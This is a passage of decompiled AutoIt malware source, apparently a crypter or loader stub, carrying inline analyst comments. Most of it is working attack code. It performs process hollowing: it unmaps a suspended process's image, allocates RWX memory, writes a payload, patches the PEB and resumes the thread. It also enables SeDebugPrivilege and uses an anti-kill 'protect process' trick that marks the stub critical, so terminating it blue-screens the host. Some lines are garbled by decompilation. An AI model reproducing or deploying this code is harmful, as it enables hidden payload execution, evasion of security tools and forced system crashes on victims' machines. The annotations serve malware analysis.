If $frelocatable Then
$pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
If @error Then
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
__runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(101, 1, 0)
EndIf
EndIf
EndIf
$frelocate = True
Else
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
__runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(101, 0, 0)
EndIf
EndIf
EndIf
DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint)
#Region 7. CONSTRUCT THE NEW MODULE
Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]")
Local $pmodule = DllStructGetPtr($tmodule)
Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
Local $timage_section_header
Local $isizeofrawdata, $ppointertorawdata
Local $ivirtualaddress, $ivirtualsize
Local $trelocraw
For $i = 1 To $inumberofsections
$timage_section_header = DllStructCreate("CHAR NAME[8];" & "DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & "DWORD VIRTUALADDRESS;" & "DWORD SIZEOFRAWDATA;" & "DWORD POINTERTORAWDATA;" & "DWORD POINTERTORELOCATIONS;" & "DWORD POINTERTOLINENUMBERS;" & "WORD NUMBEROFRELOCATIONS;" & "WORD NUMBEROFLINENUMBERS;" & "DWORD CHARACTERISTICS", $_dddhg21hfghfghfghfghffhf)
$isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA")
$ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA")
$ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS")
$ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
If $ivirtualsize AND $ivirtualsize If $isizeofrawdata Then
DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
EndIf
If $frelocate Then
If $ivirtualaddress $paddressnewbasereloc Then
$trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
EndIf
EndIf
$_dddhg21hfghfghfghfghffhf += 40
Next
If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
$acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(7, 0, 0)
EndIf
#Region 8. PEB IMAGEBASEADDRESS MANIPULATION
Local $tpeb = DllStructCreate("BYTE INHERITEDADDRESSSPACE;" & "BYTE READIMAGEFILEEXECOPTIONS;" & "BYTE BEINGDEBUGGED;" & "BYTE SPARE;" & "PTR MUTANT;" & "PTR IMAGEBASEADDRESS;" & "PTR LOADERDATA;" & "PTR PROCESSPARAMETERS;" & "PTR SUBSYSTEMDATA;" & "PTR PROCESSHEAP;" & "PTR FASTPEBLOCK;" & "PTR FASTPEBLOCKROUTINE;" & "PTR FASTPEBUNLOCKROUTINE;" & "DWORD ENVIRONMENTUPDATECOUNT;" & "PTR KERNELCALLBACKTABLE;" & "PTR EVENTLOGSECTION;" & "PTR EVENTLOG;" & "PTR FREELIST;" & "DWORD TLSEXPANSIONCOUNTER;" & "PTR TLSBITMAP;" & "DWORD TLSBITMAPBITS[2];" & "PTR READONLYSHAREDMEMORYBASE;" & "PTR READONLYSHAREDMEMORYHEAP;" & "PTR READONLYSTATICSERVERDATA;" & "PTR ANSICODEPAGEDATA;" & "PTR OEMCODEPAGEDATA;" & "PTR UNICODECASETABLEDATA;" & "DWORD NUMBEROFPROCESSORS;" & "DWORD NTGLOBALFLAG;" & "BYTE SPARE2[4];" & "INT64 CRITICALSECTIONTIMEOUT;" & "DWORD HEAPSEGMENTRESERVE;" & "DWORD HEAPSEGMENTCOMMIT;" & "DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & "DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & "DWORD NUMBEROFHEAPS;" & "DWORD MAXIMUMNUMBEROFHEAPS;" & "PTR PROCESSHEAPS;" & "PTR GDISHAREDHANDLETABLE;" & "PTR PROCESSSTARTERHELPER;" & "PTR GDIDCATTRIBUTELIST;" & "PTR LOADERLOCK;" & "DWORD OSMAJORVERSION;" & "DWORD OSMINORVERSION;" & "DWORD OSBUILDNUMBER;" & "DWORD OSPLATFORMID;" & "DWORD IMAGESUBSYSTEM;" & "DWORD IMAGESUBSYSTEMMAJORVERSION;" & "DWORD IMAGESUBSYSTEMMINORVERSION;" & "DWORD GDIHANDLEBUFFER[34];" & "DWORD POSTPROCESSINITROUTINE;" & "DWORD TLSEXPANSIONBITMAP;" & "BYTE TLSEXPANSIONBITMAPBITS[128];" & "DWORD SESSIONID")
$acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(8, 0, 0)
EndIf
DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint)
$acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(9, 0, 0)
EndIf
#Region 9. NEW ENTRY POINT
Switch $irunflag
Case 1
DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew)
Case 2
DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew)
Case 3
EndSwitch
#Region 10. SET NEW CONTEXT
$acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(10, 0, 0)
EndIf
#Region 11. RESUME THREAD
$acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread)
If @error OR $acall[0] = + -1 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(11, 0, 0)
EndIf
#Region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess)
DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread)
Return DllStructGetData($tprocess_information, "PROCESSID")
EndFunc
; Applies PE base relocations to an image copy that lives in THIS process's
; memory at $pmodule (it patches via DllStructSetData, not WriteProcessMemory),
; so the image will run at $paddressnew instead of its preferred base
; $paddressold. $tdata holds the raw .reloc directory. This is part of the
; RunPE / process-hollowing path of this stub and is annotated here purely as
; an analysis landmark; nothing in it should be "repaired".
Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)
Local $idelta = $paddressnew - $paddressold
Local $isize = DllStructGetSize($tdata)
Local $pdata = DllStructGetPtr($tdata)
Local $timage_base_relocation, $irelativemove
Local $ivirtualaddress, $isizeofblock, $inumberofentries
Local $tenries, $idata, $taddress
; Relocation type this pass applies: 3 + 7*0 = 3 (IMAGE_REL_BASED_HIGHLOW, 32-bit)
; or 3 + 7*1 = 10 (IMAGE_REL_BASED_DIR64, 64-bit). Every other type is skipped.
Local $iflag = 3 + 7 * $fimagex64
; NOTE(review): the loop header below is garbled — the comparison operator and
; right-hand operand between $irelativemove and the assignment were lost in
; decompilation/extraction. $isize is declared and never read, which is
; consistent with a dropped upper bound on $irelativemove. Left as found.
While $irelativemove $timage_base_relocation = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $pdata + $irelativemove)
$ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS")
$isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK")
; Each block is an 8-byte header followed by WORD entries.
$inumberofentries = ($isizeofblock + -8) / 2
$tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
For $i = 1 To $inumberofentries
$idata = DllStructGetData($tenries, 1, $i)
; High 4 bits = relocation type, low 12 bits = offset within the page.
If BitShift($idata, 12) = $iflag Then
$taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
EndIf
Next
$irelativemove += $isizeofblock
WEnd
Return 1
EndFunc
; Reserves/commits $isize bytes at a specific address $paddress inside the
; remote process $hprocess. Tries MEM_COMMIT (4096 = 0x1000) first, then
; MEM_COMMIT|MEM_RESERVE (12288 = 0x3000); protection is always
; 64 = 0x40 = PAGE_EXECUTE_READWRITE. Detection note: a cross-process RWX
; allocation at a fixed address (the payload's preferred image base) is a
; strong hollowing indicator. Returns the base address, or 0 with @error=1.
Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize)
Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 4096, "DWORD", 64)
If @error OR NOT $acall[0] Then
; Fallback when the range was not already reserved in the target.
$acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
EndIf
Return $acall[0]
EndFunc
; Same as __runpe_allocateexespaceataddress but lets the OS pick the address
; (lpAddress = 0): MEM_COMMIT|MEM_RESERVE (0x3000) with PAGE_EXECUTE_READWRITE
; (0x40) in the remote process. Returns the base address, or 0 with @error=1.
Func __runpe_allocateexespace($hprocess, $isize)
Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Return $acall[0]
EndFunc
; Unmaps the section at $paddress (the legitimately loaded image) from the
; suspended child so the payload can be written in its place. NtUnmapViewOfSection
; on another process is the hallmark of process hollowing (ATT&CK T1055.012).
; Only a DllCall failure (@error) is checked; the NTSTATUS in the result is
; ignored, so a non-success status still returns 1.
Func __runpe_unmapviewofsection($hprocess, $paddress)
DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress)
If @error Then Return SetError(1, 0, 0)
Return 1
EndFunc
; Wraps IsWow64Process for $hprocess and returns the BOOL* out-parameter
; ($acall[2]): non-zero when the target is a 32-bit process on 64-bit Windows.
; Presumably used by the caller to choose the 32-bit (EAX) or 64-bit (RCX)
; entry-point path — confirm in the caller, which is outside this excerpt.
Func __runpe_iswow64process($hprocess)
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Return $acall[2]
EndFunc
; Constants copied from the AutoIt WinAPI / Security UDFs (lower-cased by the
; decompiler). Only the token-access and privilege-attribute values are
; exercised by the privilege-escalation helpers further down.
Global Const $tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct"
Global Const $tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes"
Global Const $error_no_token = 1008
Global Const $se_privilege_enabled_by_default = 1
Global Const $se_privilege_enabled = 2
Global Const $se_privilege_removed = 4
Global Enum $tokenprimary = 1, $tokenimpersonation
Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation
; TOKEN_* access masks passed to OpenThreadToken.
Global Const $token_assign_primary = 1
Global Const $token_duplicate = 2
Global Const $token_impersonate = 4
Global Const $token_query = 8
Global Const $token_query_source = 16
Global Const $token_adjust_privileges = 32
Func _winapi_getlasterror($curerr = @error, $curext = @extended)
Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
Return SetError($curerr, $curext, $aresult[0])
EndFunc
; Stock Security.au3 wrapper around AdjustTokenPrivileges. Returns True when
; the API returned non-zero; False with @error=1 if the DllCall itself failed.
Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0)
Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__getlengthsid($psid)
If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid)
If @error Then Return SetError(2, @extended, 0)
Return $acall[0]
EndFunc
Func _security__impersonateself($ilevel = $securityimpersonation)
Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__isvalidsid($psid)
Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid)
If @error Then Return SetError(1, @extended, False)
Return NOT ($acall[0] = 0)
EndFunc
Func _security__lookupaccountname($saccount, $ssystem = "")
Local $tdata = DllStructCreate("byte SID[256]")
Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Local $aacct[3]
$aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID"))
$aacct[1] = $acall[5]
$aacct[2] = $acall[7]
Return $aacct
EndFunc
; Stock Security.au3 wrapper: resolves a privilege name (e.g. "SeDebugPrivilege")
; to its LUID, returned as an int64 ($acall[3]); 0 with @error=1 on failure.
Func _security__lookupprivilegevalue($ssystem, $sname)
Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Return $acall[3]
EndFunc
; Stock Security.au3 wrapper around OpenThreadToken. Defaults to the current
; thread. Returns the token handle, or 0 with @error (1 = GetCurrentThread
; failed, 2 = OpenThreadToken failed).
Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False)
If $hthread = 0 Then $hthread = _winapi_getcurrentthread()
If @error Then Return SetError(1, @extended, 0)
Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0)
If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
Return $acall[4]
EndFunc
; Stock Security.au3 helper: opens the thread token, and if the thread has no
; token (ERROR_NO_TOKEN = 1008) impersonates self to obtain one and retries.
; This is how the privilege helpers below get a token they can adjust.
Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False)
Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
If $htoken = 0 Then
; NOTE(review): the comparison operator is missing on the next line — the
; AutoIt UDF this was lifted from compares with `<>` here. Extraction
; artifact; left as found.
If _winapi_getlasterror() $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0)
If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0)
$htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0)
EndIf
Return $htoken
EndFunc
; Stock Security.au3 helper: enables ($fenable=True) or disables a named
; privilege on $htoken. It calls AdjustTokenPrivileges twice — first with
; Attributes=0 to read the current state into $tprevstate, then with the
; SE_PRIVILEGE_ENABLED bit set/cleared in that state. In this stub it is only
; ever used for SeDebugPrivilege (see _winapi_openprocess and
; __debuge_privilege), which is what lets the process open and flag
; processes it does not own.
Func _security__setprivilege($htoken, $sprivilege, $fenable)
Local $iluid = _security__lookupprivilegevalue("", $sprivilege)
If $iluid = 0 Then Return SetError(1, @extended, False)
Local $tcurrstate = DllStructCreate($tagtoken_privileges)
Local $icurrstate = DllStructGetSize($tcurrstate)
Local $tprevstate = DllStructCreate($tagtoken_privileges)
Local $iprevstate = DllStructGetSize($tprevstate)
Local $trequired = DllStructCreate("int Data")
DllStructSetData($tcurrstate, "Count", 1)
DllStructSetData($tcurrstate, "LUID", $iluid)
; First pass: no attribute change, only captures the previous state.
If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False)
DllStructSetData($tprevstate, "Count", 1)
DllStructSetData($tprevstate, "LUID", $iluid)
Local $iattributes = DllStructGetData($tprevstate, "Attributes")
If $fenable Then
$iattributes = BitOR($iattributes, $se_privilege_enabled)
Else
$iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled))
EndIf
DllStructSetData($tprevstate, "Attributes", $iattributes)
; Second pass: apply the modified attributes.
If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False)
Return True
EndFunc
Func _security__sidtostringsid($psid)
If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "")
Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0)
If @error OR NOT $acall[0] Then Return SetError(2, @extended, "")
Local $pstringsid = $acall[2]
Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text")
_winapi_localfree($pstringsid)
Return $ssid
EndFunc
Func _security__stringsidtosid($ssid)
Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0)
If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
Local $psid = $acall[2]
Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid)
Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]")
DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data"))
_winapi_localfree($psid)
Return $tsid
EndFunc
Func _winapi_closehandle($hobject)
Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_createsolidbrush($ncolor)
Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_deletedc($hdc)
Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_deleteobject($hobject)
Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_fillrect($hdc, $ptrrect, $hbrush)
Local $aresult
If IsPtr($hbrush) Then
$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush)
Else
$aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush)
EndIf
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_getclassname($hwnd)
If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
If @error Then Return SetError(@error, @extended, False)
Return SetExtended($aresult[0], $aresult[2])
EndFunc
Func _winapi_getclientrect($hwnd)
Local $trect = DllStructCreate($tagrect)
DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect)
If @error Then Return SetError(@error, @extended, 0)
Return $trect
EndFunc
Func _winapi_getcurrentthread()
Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getdc($hwnd)
Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getdesktopwindow()
Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow")
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getmodulehandle($smodulename)
Local $smodulenametype = "wstr"
If $smodulename = "" Then
$smodulename = 0
$smodulenametype = "ptr"
EndIf
Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_getwindow($hwnd, $icmd)
Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_iswindowvisible($hwnd)
Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
If @error Then Return SetError(@error, @extended, 0)
Return $aresult[0]
EndFunc
Func _winapi_lineto($hdc, $ix, $iy)
Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_localfree($hmem)
Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_moveto($hdc, $ix, $iy)
Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
; Lifted from WinAPI.au3 with the fourth parameter (the stock $fDebugPriv flag)
; renamed to a junk identifier. Opens $iprocessid with $iaccess; if that fails
; and the flag is True, temporarily enables SeDebugPrivilege on the thread
; token, retries OpenProcess, then disables the privilege again.
; Behavior worth knowing when reading __bsod(): when the first OpenProcess
; fails and the flag is False (the default, and how __bsod calls it) this
; returns 0 WITHOUT setting @error (the bare `Return 0` below).
Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $_d210hfghdfg5gdfdfdddgdfgGDFGDFGDFG = False)
Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
If @error Then Return SetError(@error, @extended, 0)
If $aresult[0] Then Return $aresult[0]
If NOT $_d210hfghdfg5gdfdfdddgdfgGDFGDFGDFG Then Return 0
Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
If @error Then Return SetError(@error, @extended, 0)
_security__setprivilege($htoken, "SeDebugPrivilege", True)
Local $ierror = @error
Local $ilasterror = @extended
Local $iret = 0
If NOT @error Then
$aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
$ierror = @error
$ilasterror = @extended
If $aresult[0] Then $iret = $aresult[0]
; Privilege is reverted on this path; __debuge_privilege(True) elsewhere is not.
_security__setprivilege($htoken, "SeDebugPrivilege", False)
If @error Then
$ierror = @error
$ilasterror = @extended
EndIf
EndIf
_winapi_closehandle($htoken)
Return SetError($ierror, $ilasterror, $iret)
EndFunc
Func __winapi_parsefiledialogpath($spath)
Local $afiles[3]
$afiles[0] = 2
Local $stemp = StringMid($spath, 1, StringInStr($spath, "\", 0, + -1) + -1)
$afiles[1] = $stemp
$afiles[2] = StringMid($spath, StringInStr($spath, "\", 0, + -1) + 1)
Return $afiles
EndFunc
Func _winapi_releasedc($hwnd, $hdc)
Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_screentoclient($hwnd, ByRef $tpoint)
Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_selectobject($hdc, $hgdiobj)
Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
If @error Then Return SetError(@error, @extended, False)
Return $aresult[0]
EndFunc
Func _winapi_stringlenw($vstring)
Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring)
If @error Then Return SetError(1, @extended, 0)
Return $acall[0]
EndFunc
; Builder placeholder: the image name of the (renamed) AutoIt3 interpreter
; that runs this script. __bsod() resolves it with ProcessExists(), so it is
; the process the "protect process" feature marks as critical.
$scriptname = "replace-autoit3.exe"
; Adlib callback (every 500 ms when "protectprocess" is enabled in
; settings.ini): re-asserts the critical-process flag on $scriptname so the
; stub cannot be killed without a bugcheck. The status string __bsod returns
; is discarded.
Func anti_hook()
__bsod($scriptname, True)
EndFunc
; Feature toggle read from <scriptdir>\settings.ini. The builder uses a
; sentinel pattern throughout: section "<feature>1", key "<feature>2",
; value "<feature>3" means enabled. The empty Else branch is a decompiler artifact.
$protectprocess = IniRead($uniscriptdir & "\settings.ini", "protectprocess1", "protectprocess2", "NotFound")
If $protectprocess = "protectprocess3" Then
AdlibRegister("anti_hook", 500)
Else
EndIf
; Sets or clears the "critical process" flag on the process whose image name
; is passed in the (junk-named) first parameter, via
; NtSetInformationProcess(ProcessBreakOnTermination = 29, BOOL). While the
; flag is set, terminating that process — Task Manager, taskkill, an AV
; kill — triggers a CRITICAL_PROCESS_DIED bugcheck (blue screen). This is the
; stub's anti-kill / "protect process" mechanism: anti_hook() re-applies it
; every 500 ms, exitme() clears it so the stub's own exit does not crash the
; host. The kernel requires SeDebugPrivilege for this information class,
; hence the privilege is enabled first (and, note, never reverted here).
; Returns a status string that every caller in this file ignores.
Func __bsod($_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5, $bsod_status)
Local Const $status_success = 0
; PROCESSINFOCLASS ProcessBreakOnTermination.
Local Const $bsod_class = 29
Local Const $info_length = 4
; 2035711 = 0x1F0FFF = PROCESS_ALL_ACCESS (pre-Vista mask).
Local Const $process_all_access = 2035711
Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr
; AutoIt function names are case-insensitive; this resolves to __debuge_privilege().
If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] CAN NOT CHANGED"
$process_id = ProcessExists($_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5)
If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] NOT EXIST"
; Called without the debug-privilege flag, so on failure _winapi_openprocess
; returns 0 without @error; the check below then does not fire and the
; NtSetInformationProcess call proceeds with a NULL handle (and fails).
$process_handle = _winapi_openprocess($process_all_access, True, $process_id)
If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] PROCESS"
$bsod_struct = DllStructCreate("BOOL BSOD_STATUS")
DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status)
$bsod_struct_ptr = DllStructGetPtr($bsod_struct)
$result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length)
_winapi_closehandle($process_handle)
$bsod_struct_ptr = 0
If $result[0] = $status_success Then
Return "+[>] BSOD OF PROCESS [ " & $_d210hfghdfg5gdfdfdddgdfgdfg4f5f64g65dfghfghfgh5 & " ] CHANGED WITH NO ERROR" & @CRLF
Else
